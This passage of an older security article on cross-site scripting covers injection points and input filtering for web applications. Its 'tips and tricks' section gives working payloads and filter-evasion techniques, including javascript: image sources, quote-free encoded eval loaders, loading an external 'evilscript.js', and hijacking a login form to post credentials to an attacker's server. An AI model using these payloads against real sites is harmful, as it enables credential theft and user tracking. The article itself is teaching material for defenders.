Real World XSS

Author: David Zimmer <dzzie@yahoo.com>
Site: http://sandsprite.com/Sleuth
Article Downloads: small_xss_utilities.zip

Section 1 - Introduction - Prerequisites - About the Article Downloads - Impacts (Attack Scenario) - Impact Summary Section 2 - Methods of Injection, and filtering - Injection Points - Injection methods and filtering - XSS scripting tips and tricks Section 3 - Inside the mind, mental walk along of a XSS hack Section 4 - Conclusion

INJECTION POINTS

The next logical step in understand XSS is to enumerate its injection points. Where can our web applications fall victim? Since XSS works as an interaction with active server content, any form of input should be filtered if it is ever to show up in a html page.

The default example, and the easiest to exploit, is parameters passed in through query string arguments that get written directly to page. These are enticingly easy because all of the information can be provided directly in a clickable link and does not require any other html to perform.

Many web authors feel that making their page only respond to POSTed inputs gives them an added layer of security against these types of attacks. While this can be true if coupled with other preventive measures, any where i can inject a html form and have the user click a submit button, I can get them to post to a form (and yes the form can be hidden and the submission easily automated).

The above two examples describe active XSS attacks. That is to say ways in which a user has to take an action and make a choice to be hit with a XSS attack. This gives the user the opportunity to examine the link or to discover us, this is no good from the exploiters view. Sure it works, but it is to dependant and relies on us not getting caught and having the user care enough to take some action.

More dangerous are passive XSS attacks. These are defined as attacks I can perform where the user will not have to take any action, they will not have to click on any link, and they will have no idea that anything out of the ordinary is occurring. These attacks occur automatically and can hit very very large audiences completely silently.

If the user has to take no action, how does the malicious data make it to them? Database storage. Think of a messageboard, If I were able to post active scripting in my post, anyone who viewed my page would automatically be executing whatever I could cook up without even knowing it. Think laterally for a second and you will quickly realize that any data store your web app does that eventually makes it back for surfer viewing is potentially a target for a malicious user to create a passive XSS attack with.

This is how I achieved the XSS User tracking mentioned in the above example. I was performing a security audit for a large forum site. The site allowed users to post articles and discussions and kept a marquee of the top 10 as part of its default page template. Every single page on the site had this marquee, and through parameter manipulation and its subsequent database storage, I was able to have the server output my tracking code to every single surfers that was on the site.

I sat back, watched and catalogued all of the sites users as they navigated amongst the pages. Had this not just been a demonstration, I could have literally linked usernames and email addresses to those observed surfing habits. Probably not something you would desire for your prized user base.

Sites that are particularly vulnerable to this form of attack would include guest books, html chatrooms, messageboards, discussion forms etc. If you have any of these on your site pay particular attention to filtering user supplied data. If you do find a XSS hole on your site, you must also make sure to scrub your database to break any of the existing code that may already be stored away. When you are doing the filtering remember to use case insensitive search’s, it is a simple mistake but much to easily overlooked.

Another note worth throwing in here, is that as business apps with private intranets and integrated web applications become more prevalent, Even windows developers have to start concerning themselves with the dangers of cross site scripting. In a humorous example, the other day at work I was able to enter html code in a business app we are developing, which in turn became displayed in the web app interface we had integrated with it. This adds a whole new dimension to XSS and even Sql injection attacks, but alas I digress.

One last Injection point to consider is your error pages. Some servers include special "404 Page Not Found" or servlet error messages that detail the page that was requested, or parameters passed in. If these elements are not filtered they provide a perfectly overlooked breeding ground for XSS injection.

INJECTION METHODS AND FILTERING...

Now that we have a handle on the breadth of the problem, and where the malicious input may come from...we have to understand just what data may be thrown at us and how to combat it.

Active XSS is relatively easy to prevent by filtering out a series of characters in any user input received. Since each page has a defined window of inputs, they can all be filtered in a quite logical sequential way.

When we migrate to shielding against passive XSS attacks it is somewhat of a different story. Often user information and data is taken in through a series of web forms. The final pages, a conglomeration of many users supplied data. Of course, again all input data must be filtered, but typically there are many more places for err to crop up. This problem is compounded by the desire for many of these types of datastorage web applications to allow the user to enter some html inputs.

Html is a very dynamic and free flowing language. Something that allows the web to be as advanced and colorful as it is, and also something that can make it a nightmare to parse and filter. To make matters even worse, browser technology and features are expanding at an incredible rate. While this makes the web fun and dynamic, it makes the security auditors job more difficult. How can you expect a legacy web application to take into account new features, protocols and attack vectors? You cant.

The easiest way to deny cross site scripting (and probably the only really secure way) is to deny users the ability to use any form of html in their data. If you would like to allow html, just realize that your filtering routines must be designed very wisely. Many many very large high profile sites have had XSS holes discovered in them as the result of filter loop holes, including Yahoo and Hotmail.

The next logical step is to see some examples of just how XSS can get inserted into a page. I have created a simplistic asp page that will walk you through some common injection points and example exploitation of it. Please take a few minutes to read through it and play with the examples. To see how it all works right click and view source and identify where the injection occurred.

[ insert url of demo page here ]

FILTERING

Filtering can be both a relatively simple matter, and a vastly complex one all at the same time. The incongruece lies in the extent of your needs. Your server side scripting language of choice can also help you minimize your exposure. Before we get into active server languages just let me admit I am most familiar with asp so that is where the heft of my examples shall rest.

Lets assume you have a parameter coming in that you expect to be an integer. That assumption can often be your downfall, which incidentally is also why these types of parameters are often found to be sql injection points as well. Anyway.. integer types are easy to filter. Actually we can let the ASP engine cleanse these for us in one step. Consider the asp line:

x=cInt(Request.QueryString("num"))

What happens if our friend num is not an integer? ASP engine throws an error

Microsoft VBScript runtime error '800a000d' Type mismatch: 'cint'

Well that handles that. In perl I believe simply adding +0 to the variable will have a similar effect and force the variable to be numeric.

But what about string types? That is where the brunt of the work is going to lie and where all of the problems begin. If we do not want to allow any html input what so ever then our job is simple. Remove all < signs and quotes and we should be pretty safe as long as any html we insert into dynamically is always wrapped in a quoted string. Note that if we had a page source something like:

<img src=/images/img<%Response.Write(Request.QueryString('nextimg'))%>%gt;

In this example removing quotes and < will make it very hard for an attacker to create a usable attack but I would not venture to say it impossible. Since the src= attribute is not quoted in anyway, there is nothing for them to have to break out of. If the next img value merely contains a space in it they will effectively be out of the src= attribute and able to insert their own code such as onerror=. Even though technically they will be able to execute code with this

technique, scripting without the use of quotes is extremely hard (or at least I haven’t discovered the trick to it yet) see the tips and tricks section for some techniques I am playing with to try to work around it.

The last category and the most in-depth to cover is the technique and considerations of allowing only some html content and trying to deny the use of malicious html and scripting.

Users who would use these techniques include web mail providers, message boards and html chatrooms. Before we go into script filtering we should expand on the definition of malicious html some. If an attackers goal is only to wack your site he might be just as content to make your new message board unusable to others as he is to use it to exploit all your surfers. This could easily be done through pure html tags with no attributes. It is doubtful that you would want your users to have the ability to enter a <plaintext> tag that would turn the rest of your html page and forms into an unusable blob of text. It is also unlikely that you would want them to embed a 10000000 x 10000000 image of two elephants mating. When it comes to allowing users to post html, just beware that you are in it for the long haul. Both in maintaining your filters to current technological demands as well as accommodating for non script based attacks.

Enough digression. Onto the filters. A good disclaimer to enter here is that I am not that experienced in creating keyword filters. When it comes to my projects I filter exclusively no html. I do however have alot of experience working around filters and have read alot of discussions so with that in mind here we go.

The only sane implementation I have heard of is allowing a very confined list of html you want to allow and denying all other tags. This could be implemented by splitting the textblob at all < signs and then reading up to the first space in each element to see what the tag type was. If the tag was recognizable and allowed then grab the offset of the closing tag and replace the substring with a clean no attribute version of it. If the tag was not allowed then it would be removed. If the tag was not allowed and did not contain a closing > then I would ummm I don’t know I would have to define the filter and experiment alot :)

For tags where you absolutely had to allow attributes such as img src= tags, I would grab the necessary src= attribute, validate it, and then insert it into my own clean img src= tag so I didn’t have to worry about any event handlers or lowsrc or dynsrc or the like. The same technique would be applied to href= attributes. A safe list of tags to allow along these guide lines would be:

<font face= size=></font>
<b></b>, <I></i>, <u></u>
<img src=>
<a href=></a>

Etc.etc. Really this is probably all I would allow by default. IF you need more follow the above guidelines on implementation.

So assuming you follow the above guidelines and allow no tags and no attributes other than those you copy over to the saved data what will you have to validate to make sure your users are safe?

If the above list is all you allow, I will assume you can manage validating the font size= and face= parameters. Img src and href= are two big ones worthy of many debates and many dangers that I will attempt to present next.

Lets first look at our img src tag. We have cleansed it from all the tricks of lowsrc dynsrc, event handlers and style elements simply by parsing out the src= element. Now we must validate it.

I am walking through thoughts here as we go, so please forgive any jumps.

1)We have to quote the src= string to be safe and accommodate for urls with spaces.
2)We should remove all single & double quotes in it. 
3)I would reject any urls with ? querystring identifiers in it and make sure
    that it did not have .cgi, .pl .php .asp etc in the querystring. Sure we could
    make a .jpg a perl script but we cant account for every loop hole and this is 
    already an overcautious measure against webbugs.
4)Next I would check the protocol. I would deny anything that wasn’t explicitly http://

So what do these filters prevent against?

Quoting the string makes sure they cannot escape the element attribute and insert their own event handlers. This must be don’t in conjunction with step 2 replacing all quotes. Actually you probably don’t have to replace both, just the ones you use to quote the string with your src= element.

Denying all urls (for img src any) that had ? or reference to a server script would deny users the ability to webbug your surfers. A danger of this could be collecting stats on users and site and tracking users across pages by their referrer.

!!Note that any link aiming off server will reveal http referrer headers. This is a major reason why web developers are told not to include important info in query strings and how I used to collect admin logins to chat servers :P (It may also be a good idea to add target=_blank to all links to avoid a possible referrer leak,[but there will always be a referrer leak for img src tags])

Next we validate the protocol. For obvious reasons we probably don’t want to allow the file:// protocol on links or images. For equally obvious reasons vbscript: and javascript: would be an unpleasant experience. In the end it will be best to not worry about what is there, and only worry about what isn’t. No http:// at the beginning of the string, then deny the tag. The reason is it is relatively easy to add protocol handlers to windows. Aim:// has its own that may have been found vulnerable as well as icq:// if these protocols are present in an img tag that may be enough to make the browser fire the registered program type.

As a humorous example, back in the days of IE5 I used to embed an img src=telnet://myip:23 and then run a custom daemon. All of a sudden my friends would complain that some window had popped up and that someone was typing text to their screen! Heh parlor tricks gotta love em. On a more serious note, you can see the possible danger.

One other thing I just thought of is the possible danger of line break tricks. If you follow the above explicitly you should be ok, but if you were to vary at all you should be aware that there is a whole subsection of filter bypassing techniques based on inserting CR, LF or CRLF into input strings. I have also seen javascript execute with a -> breaking it up. Consider how these may impact your filters

That should give you the basis for a sane implementation of a minimal content keyword filter. If you try to base your filters off of just replacing keywords you are going to run into all kinds of complexities like new elements, attributes you didn’t know about, weird event handlers, script encoding, and even multiline tags that can throw your parsing for a loop. If you want to try any of those techniques may the force be with you luke *breathes like darth vader*

XSS SCRIPTING TIPS AND TRICKS

Well I couldn’t resist this section, this is where I have my most fun anyway. This is some of the techniques people can hit you with with XSS

Q) Just how much script can you inject in an image src tag?

A) Its a different style of coding but it can get quite complex :)

Q) What are the biggest tricks useful in XSS javascripting?
	1) knowing how to embed nested quotes is a necessity you can escape
		quotes in a quoted string like this \' or \" or you can use
		the unicode equilivents \u0022 and \u0027
		ex: alert("\u0022") or alert("\"")

	2) keyword filters that allow any js to execute are useless
		ex: a='navi';b='gator.userAgent';alert(eval(a+b)) 

	3) short input length + script block embed = unlimited script power if
		you can squeeze in an script src=

	
	4) ssl pages warn if script src= comes from untrusted site, but if you 
		can upload anything to the server like image or article that is
		actually .js file commands, you can bypass this warning because
		script src=file.jpg (also useful to help bypass input length reqs
		(also note IE doesn’t care a wink about file extensions on script src=
		files :) 

	5) you can read an entire pages content with javascript in IE, not just
		limited to manipulating form elements. You can also edit the page
		on the fly. learn your dhtml object model danielson !

	6) event stealing: say a page with a log in form has a XSS hole,
		document.forms[0].onsubmit=myfunction
		document.forms[0].btnNew.onclick=myfunction
		document.forms[0].action="http://myserver/myscript.asp"

	7) styles trickery. I have to learn these tricks too! but from what I have
		heard hinted at and mentioned in passing there are some cool power
		tricks to be had!

	8) be familiar with methods of script encoding.
		<img src='vbscript:do%63ument.lo%63ation="http://www.yahoo.com"'>
		<IMG SRC="javascript:alert('test');">
		<IMG SRC="javasc	ript:alert('test');"> <-- line break trick
                \09 \10 \11 \12 \13 as delimiters all work.

	9) working with no quotes (also necessary dealing with injection on php scripts)
		with php scripts any " or ' we inject is automatically turned into
		\" and \' respectively :( this is a big problem for complex scripts.

		It kinda works ok for event handler insertion we can still close the
		parent quotes because html doesn’t understand the \" escape sequence
		and only sees the " this would let us use simple things where we could
		get away with only using strings already found in the document, numbers
		variables, etc but what if we need to include our own string?

		chew on this:
		regexp = /this is my string its actually a reg expression/
		alert(regexp.source)

		I haven’t really decided how useful an evasion this is yet. I myself
		am still chewing away like overcooked steak. With this we can get away
		with no quotes, however / which we need for urls are special chars and
		need to be escaped in the reg exp. and php takes \ (which is the reg
		exp escape char as an escape char and escapes it to \\ so that is
		confusing. however we also have the power of regexps in our toolbox 
		and we have a host of built in objects to generate and  build up strings
		from so something like:

		n=/http:  myserver myfolder evilscript.js/
		forslash=location.href.charAt(6)
		space=n.source.charAt(5) 
		alert(n.source.split(space).join(forslash))
		//document.scripts[0].src = n.source.split(space).join(forslash)

a little tricky but doable that chewed well after all *yummie*

another trick that could be useful with the no quotes hack is a simple
		script encoder such as the below example

		pcent=/%/.source
		str=/20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source
		temp=str.substring(0,0)
		for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}
		eval(unescape(temp))

		Voila, complex embeddable scripts with no quotes or forward slashes.

Next Section